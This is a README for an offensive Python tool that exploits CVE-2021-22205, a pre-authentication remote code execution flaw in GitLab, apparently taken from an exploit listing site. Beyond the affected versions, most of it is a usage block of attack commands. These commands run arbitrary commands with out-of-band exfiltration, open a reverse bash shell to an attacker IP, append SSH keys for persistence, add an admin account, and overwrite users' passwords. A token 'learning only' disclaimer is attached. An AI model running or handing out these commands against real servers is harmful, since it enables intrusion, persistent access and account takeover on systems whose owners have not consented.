Share
## https://sploitus.com/exploit?id=8E284760-82AD-5C4C-BD1C-413114595833
# CVE-2021-22205

GitLab CE/EE Preauth RCE using ExifTool

*This project is for learning only, if someone's rights have been violated, please contact me to remove the project, and the last **DO NOT USE IT ILLEGALLY** If you have any illegal behavior in the process of using this tool, you will bear all the consequences yourself. All developers and all contributors of this tool do not bear any legal and joint liabilities*

## Description

An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution.

Affect Versions:

- \>=11.9, <13.8.8
- \>=13.9, <13.9.6
- \>=13.10, <13.10.3

## Features

- Gitlab version detection through the hash in Webpack manifest.json 

- Automatical out-of-band interactions with DNSLog & PostBin
- Support Reverse Bash Shell / Append SSH Key to authorized_keys
- Support ENTER to modify and restore gitlab user password

## Usage

```bash
๐Ÿš โ€บโ€บโ€บ python CVE-2021-22205.py

      โ–‘โ–‘โ–‘โ–‘โ–โ–โ–‘โ–‘โ–‘  CVE-2021-22205
 โ–  โ–‘โ–‘โ–‘โ–‘โ–‘โ–„โ–ˆโ–ˆโ–„โ–„  GitLab CE/EE Unauthenticated RCE using ExifTool
  โ–€โ–€โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–€โ–‘โ–‘  Affecting all versions starting from 11.9
  โ–‘โ–‘โ–โ–โ–‘โ–‘โ–โ–โ–‘โ–‘  security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild
 โ–’โ–’โ–’โ–โ–โ–’โ–’โ–โ–โ–’  github.com/inspiringz/CVE-2021-22205

Usage:
    python3 CVE-2021-22205.py -u site_url -m detect        # gitlab version & vuln detect
    python3 CVE-2021-22205.py -u site_url -m rce1 'id'     # rce (echo via postbin oob) 
    python3 CVE-2021-22205.py -u site_url -m rce2 'id'     # rce (echo via write file) *
    python3 CVE-2021-22205.py -u site_url -m rev ip port   # reverse bash shell
    python3 CVE-2021-22205.py -u site_url -m ssh git/root  # append ssh authorized_keys
    python3 CVE-2021-22205.py -u site_url -m add user pass # add manager account *
    python3 CVE-2021-22205.py -u site_url -m mod user      # modify specified user's password => P4ss@GitLab
    python3 CVE-2021-22205.py -u site_url -m rec user      # restore specified user's original password
```

- The `site_url` parameter format: http[s]://<domain|ip>[:port]/, such as: https://example.com:9000/
- Methods(rce2,add) marked by `*` is unstable, may not work :(
- You can modify the script content according to the actual environment

## Screenshot

Detect:

![image-20211111130659726](images/image-20211111130659726.png)

RCE(Echo via PostBin OOB):

![image-20211111132623307](images/image-20211111132623307.png)

Reverse Bash Shell:

![image-20211111131442470](images/image-20211111131442470.png)

Append SSH Key to authorized_keys:

![image-20211111133555010](images/image-20211111133555010.png)

Gitlab user password modification and restoration:

![image-20211111132115090](images/image-20211111132115090.png)

## Reference

- https://github.com/projectdiscovery/nuclei-templates/blob/637eec3efac6eb384742c7aaa4e7d14f3392ede9/cves/2021/CVE-2021-22205.yaml
- https://gitlab.com/gitlab-org/cves/-/blob/master/2021/CVE-2021-22205.json
- https://github.com/righel/gitlab-version-nse